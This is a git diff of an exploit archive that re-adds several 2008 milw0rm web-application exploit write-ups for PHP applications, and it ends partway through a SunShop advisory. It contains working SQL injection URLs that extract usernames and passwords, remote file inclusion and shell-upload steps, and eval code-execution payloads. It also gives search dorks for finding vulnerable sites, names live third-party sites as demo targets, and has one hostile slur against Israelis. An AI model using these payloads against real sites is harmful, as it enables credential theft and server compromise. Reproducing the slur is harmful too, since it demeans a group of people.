+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-08-15]
diff --git a/platforms/php/webapps/6254.txt b/platforms/php/webapps/6254.txt
index be2de6913..0a5675081 100755
--- a/platforms/php/webapps/6254.txt
+++ b/platforms/php/webapps/6254.txt
@@ -1,23 +1,23 @@
-##################################################################################################################################
-Name: Xnova(Ogame) Remote File Inclusion
-Author : NuclearHaxor
-Contact MSN: nuclearhaxor@hotmail.com
-
-homepage of xnova: http://xnova.fr/
-
-Vuln file: includes/todofleetcontrol.php
-Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)
-
-Exploit(this exploit works in 90% targets):
-
-------
-target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
-or new version of xnova:
-target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
-------
-
-FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r
-
-##################################################################################################################################
-
-# milw0rm.com [2008-08-17]
+##################################################################################################################################
+Name: Xnova(Ogame) Remote File Inclusion
+Author : NuclearHaxor
+Contact MSN: nuclearhaxor@hotmail.com
+
+homepage of xnova: http://xnova.fr/
+
+Vuln file: includes/todofleetcontrol.php
+Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;)
+
+Exploit(this exploit works in 90% targets):
+
+------
+target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]?
+or new version of xnova:
+target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]?
+------
+
+FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r
+
+##################################################################################################################################
+
+# milw0rm.com [2008-08-17]
diff --git a/platforms/php/webapps/6258.txt b/platforms/php/webapps/6258.txt
index b94e2b008..027eee4d2 100755
--- a/platforms/php/webapps/6258.txt
+++ b/platforms/php/webapps/6258.txt
@@ -1,46 +1,46 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# ---  d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # 
-# ---  rsauron  - letsgorun - K1u - DON - OutLawz - MAGE  --- # 
-################################################################ 
-# 
-# Author: r45c4l and sinner_01 
-# 
-# Home  : www.darkc0de.com & ljuska.org 
-# 
-# Email : r45c4l@hotmail.com, sinn3r01@gmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# App Name:  PHPBasket 
-# 
-# Soft.Site: http://www.phpbasket.com/
-# 
-# Dork: "Powered by PHPBasket" 
-# 
-# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
-# 
-# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users--
-# 
-#Example: 
-#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
-#
-#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- 
-#
-################################################################ 
-# Vuln Discovered 17/08/2008 
-
-# milw0rm.com [2008-08-17]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# ---  d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # 
+# ---  rsauron  - letsgorun - K1u - DON - OutLawz - MAGE  --- # 
+################################################################ 
+# 
+# Author: r45c4l and sinner_01 
+# 
+# Home  : www.darkc0de.com & ljuska.org 
+# 
+# Email : r45c4l@hotmail.com, sinn3r01@gmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# App Name:  PHPBasket 
+# 
+# Soft.Site: http://www.phpbasket.com/
+# 
+# Dork: "Powered by PHPBasket" 
+# 
+# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
+# 
+# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users--
+# 
+#Example: 
+#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- 
+#
+#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- 
+#
+################################################################ 
+# Vuln Discovered 17/08/2008 
+
+# milw0rm.com [2008-08-17]
diff --git a/platforms/php/webapps/6259.txt b/platforms/php/webapps/6259.txt
index 34448a7a0..5744c1c62 100755
--- a/platforms/php/webapps/6259.txt
+++ b/platforms/php/webapps/6259.txt
@@ -1,64 +1,64 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  VidiScript  
- 
-<<->> Demo site : www.vidiscript.com/mainstreamdemo
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-        1) first Register in site 
-        
-        2) login and go to ur profil and in Current avatar .. u can upload shell ... shell.php 
-         
-        3) hack site  :)  finished 
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus 
-                           
-                      :: abo-najm $ hacker-b0y & br1ght-dark & eng.silent $ spid3r-net & golden-zero
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-08-18]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  VidiScript  
+ 
+<<->> Demo site : www.vidiscript.com/mainstreamdemo
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+        1) first Register in site 
+        
+        2) login and go to ur profil and in Current avatar .. u can upload shell ... shell.php 
+         
+        3) hack site  :)  finished 
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus 
+                           
+                      :: abo-najm $ hacker-b0y & br1ght-dark & eng.silent $ spid3r-net & golden-zero
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-08-18]
diff --git a/platforms/php/webapps/6260.txt b/platforms/php/webapps/6260.txt
index 440dcda26..ab8061451 100755
--- a/platforms/php/webapps/6260.txt
+++ b/platforms/php/webapps/6260.txt
@@ -1,35 +1,35 @@
-########################################################################################
-#
-#   Name        :   cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities
-#   Author      :   cOndemned [ Dark-Coders ]
-#   Greetz      :   Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
-#   Conditions  :   Magic quotes gpc = On & Off / User must be logged into 
-#
-########################################################################################
-
-source of /show_topic.php :
-
-    21.     $id=$_REQUEST['id'];
-    22.
-    23.     if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';
-    24.
-    25.     $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);
-    26.
-    27.     mysql_select_db($mysql_db);
-    28.
-    29.     $sql = "SELECT * FROM `topics` WHERE `id` = $id";
-
-
- proof of concept :
-    
-    /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*
-
-
-second sql injection (magic quotes gpc must be off):
-    
-    /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*
-
-   
-just 4 fun
-
-# milw0rm.com [2008-08-18]
+########################################################################################
+#
+#   Name        :   cyberBB v. 0.6 Multiply Remote SQL Injection Vulnerabilities
+#   Author      :   cOndemned [ Dark-Coders ]
+#   Greetz      :   Avantura, str0ke, ZaBeaTy, voo|doo, irk4z, and many, many more...
+#   Conditions  :   Magic quotes gpc = On & Off / User must be logged into 
+#
+########################################################################################
+
+source of /show_topic.php :
+
+    21.     $id=$_REQUEST['id'];
+    22.
+    23.     if(isset($_REQUEST['p'])) $p=$_REQUEST['p']; else $p='';
+    24.
+    25.     $db = mysql_connect($mysql_server,$mysql_user,$mysql_pass);
+    26.
+    27.     mysql_select_db($mysql_db);
+    28.
+    29.     $sql = "SELECT * FROM `topics` WHERE `id` = $id";
+
+
+ proof of concept :
+    
+    /show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*
+
+
+second sql injection (magic quotes gpc must be off):
+    
+    /profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/*
+
+   
+just 4 fun
+
+# milw0rm.com [2008-08-18]
diff --git a/platforms/php/webapps/6261.txt b/platforms/php/webapps/6261.txt
index c6e93fea4..08b7c8174 100755
--- a/platforms/php/webapps/6261.txt
+++ b/platforms/php/webapps/6261.txt
@@ -1,115 +1,115 @@
-##########################################################
-# GulfTech Security Research              August 16, 2008
-##########################################################
-# Vendor : Turnkey Web Tools, Inc
-# URL : http://www.turnkeywebtools.com
-# Version : PHP Live Helper <= 2.0.1
-# Risk : Multiple Vulnerabilities
-##########################################################
-
-
-Description:
-PHP Live Helper is an online support system written in php that
-allows the visitors of a website to interact in real time with
-the site owners. There are a number of issues in PHP Live Helper
-that allow for several different attacks such as SQL Injection,
-Variable Overwriting, and remote code execution. The issues
-require no authentication to exploit, and users are encouraged
-to upgrade as soon as possible.
-
-
-
-SQL Injection:
-There are a number of SQL Injection issues in PHP Live Helper
-that allow for an attacker to have arbitrary access to database
-contents such as administrator credentials. First, let's have a
-look at global.php @ lines 51-60
-
-function get ($table, $id, $from="id") {
-    $result=$this->DB_site->query_first("SELECT * FROM ".
-    $this->dbprefix.$table." where ".$from."='$id'");
-    if (is_array($result)) {
-        foreach ($result as $key => $val) {
-            $info[$key] = stripslashes($val);
-        }
-    }
-    return $info;
-}
-
-As we can see in the above code, all of the parameters passed to
-the get() function are unsanitized. So, if the data is not sanitized
-before being sent to get() we have an SQL Injection issue.
-
-/onlinestatus_html.php?dep=-99' UNION SELECT 1,2,3,4,5,6,7,8 FROM
-admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/*
-
-An example of the vulnerable function being called can be seen in
-onlinestatus_html.php @ line 19. As a result a url like the one
-above can be used to enumerate the admin password for the PHP Live
-Helper installation. If there is a match to the specified character
-you will see an sql error, otherwise you will see an image file.
-
-
-
-Arbitrary Variable Overwriting:
-PHP Live Helper is vulnerable to a limited Variable Overwriting issue
-due to some faulty register globals emulation code. The vulnerable code
-in question can be found at libsecure.php @ lines 400-414
-
-unset ($_GET[abs_path]);
-$rg = ini_get ('register_globals');
-$getget_count = @count ($_GET);
-$getget_keys = @array_keys ($_GET);
-for ($i = 0; $i < $getget_count; ++$i)
-{
-  $getget_name = $getget_keys[$i];
-  $getget_value = $_GET[$getget_keys[$i]];
-  $_GET[$getget_name] = strip_tags (urldecode ($getget_value));
-  if ($rg == 1)
-  {
-    $$getget_name = strip_tags (urldecode ($getget_value));
-    continue;
-  }
-}
-
-The above code shows that variables can be overwritten, but because
-of where it is called, only variables from within the db config file
-can be overwritten (database info, and language file setting). This
-is enough though to allow an attacker to execute arbitrary code on the
-server by overwriting the table prefix variable with an arbitrary SQL
-query in order to gather the location of report files, and then
-overwriting the language file so that the report containing the
-malicious php code is included and executed. The odd thing is that this
-registers global emulation code is only called when register globals is
-already on, so it is kind of pointless.
-
-
-
-Arbitrary Code Execution:
-A different bit of code is set to run when register globals are off. The
-code in question is located in /includes/globalsoff.php and attempts to
-emulate register gloabls by recursively creating variables based on the
-GPC super globals. The problem is that all of the variable creation is
-done using eval() and thus allows for remote code execution.
-
-/chat.php?rg=0&test=";phpinfo();exit;//
-
-A url like the one shown above will successfully execute the specified
-arbitrary php code. It should be noted that by setting rg=0 an attacker
-can have this code ran regardless of register globals settings since if
-globals is on you can influence the "rg" parameter, and if it is off,
-the script runs as intended.
-
-
-
-Solution:
-The TurnKeyWebTools developers have addressed these issues in the latest
-version of PHP Live Helper which can be found at the following url.
-
-http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team 
-
-# milw0rm.com [2008-08-18]
+##########################################################
+# GulfTech Security Research              August 16, 2008
+##########################################################
+# Vendor : Turnkey Web Tools, Inc
+# URL : http://www.turnkeywebtools.com
+# Version : PHP Live Helper <= 2.0.1
+# Risk : Multiple Vulnerabilities
+##########################################################
+
+
+Description:
+PHP Live Helper is an online support system written in php that
+allows the visitors of a website to interact in real time with
+the site owners. There are a number of issues in PHP Live Helper
+that allow for several different attacks such as SQL Injection,
+Variable Overwriting, and remote code execution. The issues
+require no authentication to exploit, and users are encouraged
+to upgrade as soon as possible.
+
+
+
+SQL Injection:
+There are a number of SQL Injection issues in PHP Live Helper
+that allow for an attacker to have arbitrary access to database
+contents such as administrator credentials. First, let's have a
+look at global.php @ lines 51-60
+
+function get ($table, $id, $from="id") {
+    $result=$this->DB_site->query_first("SELECT * FROM ".
+    $this->dbprefix.$table." where ".$from."='$id'");
+    if (is_array($result)) {
+        foreach ($result as $key => $val) {
+            $info[$key] = stripslashes($val);
+        }
+    }
+    return $info;
+}
+
+As we can see in the above code, all of the parameters passed to
+the get() function are unsanitized. So, if the data is not sanitized
+before being sent to get() we have an SQL Injection issue.
+
+/onlinestatus_html.php?dep=-99' UNION SELECT 1,2,3,4,5,6,7,8 FROM
+admin_accounts WHERE id=1 AND MID(password,1,1)=concat(char(50))/*
+
+An example of the vulnerable function being called can be seen in
+onlinestatus_html.php @ line 19. As a result a url like the one
+above can be used to enumerate the admin password for the PHP Live
+Helper installation. If there is a match to the specified character
+you will see an sql error, otherwise you will see an image file.
+
+
+
+Arbitrary Variable Overwriting:
+PHP Live Helper is vulnerable to a limited Variable Overwriting issue
+due to some faulty register globals emulation code. The vulnerable code
+in question can be found at libsecure.php @ lines 400-414
+
+unset ($_GET[abs_path]);
+$rg = ini_get ('register_globals');
+$getget_count = @count ($_GET);
+$getget_keys = @array_keys ($_GET);
+for ($i = 0; $i < $getget_count; ++$i)
+{
+  $getget_name = $getget_keys[$i];
+  $getget_value = $_GET[$getget_keys[$i]];
+  $_GET[$getget_name] = strip_tags (urldecode ($getget_value));
+  if ($rg == 1)
+  {
+    $$getget_name = strip_tags (urldecode ($getget_value));
+    continue;
+  }
+}
+
+The above code shows that variables can be overwritten, but because
+of where it is called, only variables from within the db config file
+can be overwritten (database info, and language file setting). This
+is enough though to allow an attacker to execute arbitrary code on the
+server by overwriting the table prefix variable with an arbitrary SQL
+query in order to gather the location of report files, and then
+overwriting the language file so that the report containing the
+malicious php code is included and executed. The odd thing is that this
+registers global emulation code is only called when register globals is
+already on, so it is kind of pointless.
+
+
+
+Arbitrary Code Execution:
+A different bit of code is set to run when register globals are off. The
+code in question is located in /includes/globalsoff.php and attempts to
+emulate register gloabls by recursively creating variables based on the
+GPC super globals. The problem is that all of the variable creation is
+done using eval() and thus allows for remote code execution.
+
+/chat.php?rg=0&test=";phpinfo();exit;//
+
+A url like the one shown above will successfully execute the specified
+arbitrary php code. It should be noted that by setting rg=0 an attacker
+can have this code ran regardless of register globals settings since if
+globals is on you can influence the "rg" parameter, and if it is off,
+the script runs as intended.
+
+
+
+Solution:
+The TurnKeyWebTools developers have addressed these issues in the latest
+version of PHP Live Helper which can be found at the following url.
+
+http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=62
+
+
+Credits:
+James Bercegay of the GulfTech Security Research Team 
+
+# milw0rm.com [2008-08-18]
diff --git a/platforms/php/webapps/6270.txt b/platforms/php/webapps/6270.txt
index 7fc035501..c927a7950 100755
--- a/platforms/php/webapps/6270.txt
+++ b/platforms/php/webapps/6270.txt
@@ -1,50 +1,50 @@
-|___________________________________________________|
-|
-| Affiliate Directory ( id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-|
-| script : http://scripts-for-sites.com/item.php?item=107
-|
-| DorK   : "Copyright 2005 Affiliate Directory"
-|___________________________________________________|
-
-Exploit: 
-
-
-www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--
-
-
-
-
-
-L!VE DEMO: :
-
-
-http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
-|  
-| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Affiliate Directory ( id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+|
+| script : http://scripts-for-sites.com/item.php?item=107
+|
+| DorK   : "Copyright 2005 Affiliate Directory"
+|___________________________________________________|
+
+Exploit: 
+
+
+www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--
+
+
+
+
+
+L!VE DEMO: :
+
+
+http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
+|  
+| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6271.txt b/platforms/php/webapps/6271.txt
index 2e68502ec..d17aad031 100755
--- a/platforms/php/webapps/6271.txt
+++ b/platforms/php/webapps/6271.txt
@@ -1,59 +1,59 @@
-|___________________________________________________|
-|
-| Ad Board (trr.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.yourfreeworld.com/script/adboard.php
-|
-| DorK   : inurl:trr.php?id=
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--
-
-
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.downlinegoldmine.com/adboard/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--
-
-
-____________
-
-Admin Login :
-
-www.[target].com/Script/admin.php
-
-____________
-____________________________( Greetz )____________________________
-|
-| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
-|  
-| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-19]
+|___________________________________________________|
+|
+| Ad Board (trr.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.yourfreeworld.com/script/adboard.php
+|
+| DorK   : inurl:trr.php?id=
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--
+
+
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.downlinegoldmine.com/adboard/trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--
+
+
+____________
+
+Admin Login :
+
+www.[target].com/Script/admin.php
+
+____________
+____________________________( Greetz )____________________________
+|
+| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
+|  
+| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-19]
diff --git a/platforms/php/webapps/6273.txt b/platforms/php/webapps/6273.txt
index b375a9f40..74f77b81f 100755
--- a/platforms/php/webapps/6273.txt
+++ b/platforms/php/webapps/6273.txt
@@ -1,79 +1,79 @@
-##########################################################
-# GulfTech Security Research              August 18, 2008
-##########################################################
-# Vendor : Turnkey Web Tools, Inc
-# URL : http://www.turnkeywebtools.com
-# Version : SunShop <= 4.1.4
-# Risk : SQL Injection
-##########################################################
-
-
-Description:
-SunShop shopping cart is a full featured ecommerce solution written
-in php that allows for web masters to run their own online ecommerce
-operation. Unfortunately there are a number of SQL Injection issues
-in SunShop that allow for an attacker to have arbitrary access to the
-SunShop database where they can access information such as customer
-and administrator details. An updated version of SunShop has been
-released to address these issues, and users should upgrade soon.
-
-
-
-SQL Injection:
-There are quite a few SQL Injection issues within SunShop that for an
-attacker to have arbitrary access to the SunShop database. The first
-example we will have a look at is in class.ajax.php @ lines 348-362
-
-function edit_registry ($id="") {
-    global $DB_site, $dbprefix, $settings, $lang, $sess;
-    $data = $DB_site->query_first("SELECT * FROM `".$dbprefix."users_registry`
-    WHERE id='".$_POST[id]."' AND userid='".$sess->gvar('userid')."'");
-    $data = filter_data($data);
-    $out  = 'document.getElementById(\'wishform\').style.display = \'none\';';
-    $out .= 'document.getElementById(\'wisheditform\').style.display = \'block\';';
-    $out .= 'form = document.forms[\'edit_registry\'];';
-    $out .= 'form.elements[\'event[id]\'].value = \''.js_clean($data[id]).'\';';
-    $out .= 'form.elements[\'event[name]\'].value = \''.js_clean($data[name]).'\';';
-    $out .= 'form.elements[\'event[desc]\'].value = \''.js_clean($data[description]).'\';';
-    $out .= 'form.elements[\'event[month]\'].selectedIndex = '.(date('m',
-    strtotime($data['date']))-1).';';
-    $out .= 'form.elements[\'event[day]\'].selectedIndex = '.(date('d',
-    strtotime($data['date']))-1).';';
-    $out .= 'form.elements[\'event[year]\'].selectedIndex = '.((date('Y',
-    strtotime($data['date'])))-date('Y')).';';
-    return $out;
-}
-
-As seen above the SQL Injection issue here is pretty straight forward
-and is a result of a $_POST variable being used in the middle of the
-query. An attacker could exploit this SQL Injection issue by making a
-post request to "/index.php?l=edit_registry&p=1" with the following
-post data.
-
-id=-99' UNION SELECT 1,2,3,concat(username,char(58),password),5,6 FROM ss_users/*
-
-Upon successful exploitation an attacker would be presented with the
-targeted credentials. In addition to this SQL Injection are several more
-SQL Injection issues within class.ajax.php and can be found at lines 77,
-113, 138 (via the check_email() function), 349, 374, and 400. With the
-exception of the issue @ line 138 these issues are very easily identified as they use GPC variables directly within SQL queries.
-
-
-
-Solution:
-The TurnKeyWebTools developers have addressed these issues in the latest
-version of SunShop which can be found at the following url.
-
-http://www.turnkeywebtools.com/esupport/index.php?_m=news&_a=viewnews&newsid=63
-
-
-Credits:
-James Bercegay of the GulfTech Security Research Team
-
-
-
-Related Info:
-The original advisory can be found at the following location
-http://www.gulftech.org/?node=research&article_id=00125-08182008
-
-# milw0rm.com [2008-08-19]
+##########################################################
+# GulfTech Security Research              August 18, 2008
+##########################################################
+# Vendor : Turnkey Web Tools, Inc
+# URL : http://www.turnkeywebtools.com
+# Version : SunShop <= 4.1.4
+# Risk : SQL Injection
+##########################################################
+
+
+Description:
+SunShop shopping cart is a full featured ecommerce solution written
+in php that allows for web masters to run their own online ecommerce
+operation. Unfortunately there are a number of SQL Injection issues
+in SunShop that allow for an attacker to have arbitrary access to the
+SunShop database where they can access information such as customer
+and administrator details. An updated version of SunShop has been
+released to address these issues, and users should upgrade soon.
+
+
+
+SQL Injection:
+There are quite a few SQL Injection issues within SunShop that for an
+attacker to have arbitrary access to the SunShop database. The first
+example we will have a look at is in class.ajax.php @ lines 348-362
+
+function edit_registry ($id="") {
